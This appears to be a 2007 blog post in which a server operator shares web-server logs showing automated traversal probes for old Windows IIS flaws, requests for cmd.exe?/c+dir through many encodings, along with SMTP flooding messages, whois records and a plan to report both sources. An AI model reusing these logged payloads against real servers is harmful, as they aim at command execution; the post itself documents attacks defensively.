Who says Windows is secure….

Though surely just a script and a lot of attempts to hack into a windows system, this is what I found in last week’s webserver log:
222.189.7.29 - - [13/Feb/2007:07:25:54 +0100] "GET /cgi-bin/query/scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:25:55 +0100] "GET /cgi-bin/query/scripts/root.exe?/c+dir HTTP/1.0" 404 782
222.189.7.29 - - [13/Feb/2007:07:25:59 +0100] "GET /cgi-bin/query/msadc/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:00 +0100] "GET /cgi-bin/query/msadc/..À/../..À/../..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:01 +0100] "GET /cgi-bin/query/msadc/..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:05 +0100] "GET /cgi-bin/query/msadc/..À¯../..À¯../..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:06 +0100] "GET /msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:07 +0100] "GET /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:08 +0100] "GET /msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:08 +0100] "GET /msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:09 +0100] "GET /cgi-bin/query/scripts/..À/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:10 +0100] "GET /cgi-bin/query/scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:11 +0100] "GET /cgi-bin/query/scripts/..À¯..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:12 +0100] "GET /cgi-bin/query/scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:13 +0100] "GET /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:14 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:17 +0100] "GET /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:18 +0100] "GET /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:19 +0100] "GET /cgi-bin/query/scripts/../../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 811
222.189.7.29 - - [13/Feb/2007:07:26:20 +0100] "GET /cgi-bin/query/scripts/../../cmd.exe?/c+dir HTTP/1.0" 404 787
222.189.7.29 - - [13/Feb/2007:07:26:21 +0100] "GET /cgi-bin/query/scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:22 +0100] "GET /cgi-bin/query/scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:23 +0100] "GET /cgi-bin/query/scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:24 +0100] "GET /cgi-bin/query/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:24 +0100] "GET /cgi-bin/query/scripts/../../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 811
222.189.7.29 - - [13/Feb/2007:07:26:25 +0100] "GET /cgi-bin/query/scripts/../../cmd.exe?/c+dir HTTP/1.0" 404 787
222.189.7.29 - - [13/Feb/2007:07:26:26 +0100] "GET /cgi-bin/query/scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:27 +0100] "GET /cgi-bin/query/scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:28 +0100] "GET /cgi-bin/query/scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:29 +0100] "GET /cgi-bin/query/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:30 +0100] "GET /cgi-bin/query/scripts/cmd.exe?/c+dir HTTP/1.0" 404 781
222.189.7.29 - - [13/Feb/2007:07:26:31 +0100] "GET /scripts/cmd32.exe" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:32 +0100] "GET /cgi-bin/query/scripts/cmd32.exe?/c+dir HTTP/1.0" 404 783
222.189.7.29 - - [13/Feb/2007:07:26:33 +0100] "GET /cgi-bin/query/msadc/..?../..?../..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 774
222.189.7.29 - - [13/Feb/2007:07:26:33 +0100] "GET /cgi-bin/query/msadc/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 774
222.189.7.29 - - [13/Feb/2007:07:26:34 +0100] "GET /cgi-bin/query/msadc/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 800
222.189.7.29 - - [13/Feb/2007:07:26:35 +0100] "GET /cgi-bin/query/script/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 801
222.189.7.29 - - [13/Feb/2007:07:26:36 +0100] "GET /cgi-bin/query/_mem_bin/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:37 +0100] "GET /cgi-bin/query/_mem_bin/..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:38 +0100] "GET /_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:39 +0100] "GET /_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:43 +0100] "GET /cgi-bin/query/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:43 +0100] "GET /cgi-bin/query/_mem_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 777
222.189.7.29 - - [13/Feb/2007:07:26:44 +0100] "GET /cgi-bin/query/_mem_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:45 +0100] "GET /cgi-bin/query/_vti_bin/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:49 +0100] "GET /cgi-bin/query/_vti_bin/..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:50 +0100] "GET /_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:51 +0100] "GET /_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:51 +0100] "GET /cgi-bin/query/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:52 +0100] "GET /cgi-bin/query/_vti_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 777
222.189.7.29 - - [13/Feb/2007:07:26:53 +0100] "GET /cgi-bin/query/_vti_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:54 +0100] "GET /cgi-bin/query/bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:55 +0100] "GET /cgi-bin/query/bin/scripts/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 780
222.189.7.29 - - [13/Feb/2007:07:26:56 +0100] "GET /cgi-bin/query/bin/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 806
222.189.7.29 - - [13/Feb/2007:07:26:57 +0100] "GET /cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:58 +0100] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:58 +0100] "GET /cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:59 +0100] "GET /cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:00 +0100] "GET /cgi-bin/../../../../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:03 +0100] "GET /cgi-bin/..?..?..?../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:04 +0100] "GET /cgi-bin/.._../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:05 +0100] "GET /cgi-Bin/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:06 +0100] "GET /cgi-bin/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:07 +0100] "GET /Cgi-Bin/cmd32.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:07 +0100] "GET /Cgi-Bin/cmd32.exe?/c+dir" 404 675

Clearly someone who’s running a script, and I severely doubt his knowlegde…..Just trying to see if he can get in. Or espionage? The address is said to be located in China:

inetnum: 222.184.0.0 - 222.191.255.255
netname: CHINANET-JS
descr: CHINANET jiangsu province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: CJ186-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-CHINANET-JS
mnt-routes: MAINT-CHINANET-JS

Apart from this, just a few that appear quite regularly:

69.84.207.37 – – [12/Feb/2007:07:02:35 +0100] “GET /No%0Ate-email.htm HTTP/1.1” 403 864
69.84.207.37 – – [12/Feb/2007:07:06:27 +0100] “GET /cgi-bin/count.exe HTTP/1.1” 502 900
69.84.207.37 – – [12/Feb/2007:07:06:28 +0100] “GET /cgi-bin/c%0Aount.exe HTTP/1.1” 404 887
207.234.131.90 – – [12/Feb/2007:09:56:37 +0100] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1” 400 893

These are just a few of these, not a lot in a week.
Mail
Someone is trying to blow the SMTP server – for over 24 hours up to now:
%%%%%%%%%%% OPCOM 18-FEB-2007 14:46:13.71 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4977

%%%%%%%%%%% OPCOM 18-FEB-2007 14:46:13.92 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 84.246.98.2 is not backtranslatable
...
%%%%%%%%%%% OPCOM 19-FEB-2007 22:50:57.98 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4144

%%%%%%%%%%% OPCOM 19-FEB-2007 22:50:58.15 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 84.246.98.2 is not backtranslatable
to a host name

I haven’t count the entries, but the attempts occur each 2 minutes or so. Alas, the router has no ability to block him there…
This address is a UK one:
inetnum: 84.246.96.0 - 84.246.103.255
netname: UK-WH-UK-20040830
descr: World Hub Limited
descr: PROVIDER Local Registry
country: GB # US
org: ORG-WHL1-RIPE
admin-c: DA1277-RIPE
tech-c: DA1277-RIPE
status: ALLOCATED PA
mnt-by: RIPE-NCC-HM-MNT
mnt-lower: worldhub-ip
mnt-routes: worldhub-ip
source: RIPE # Filtered

Both ISP’s will be informed.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.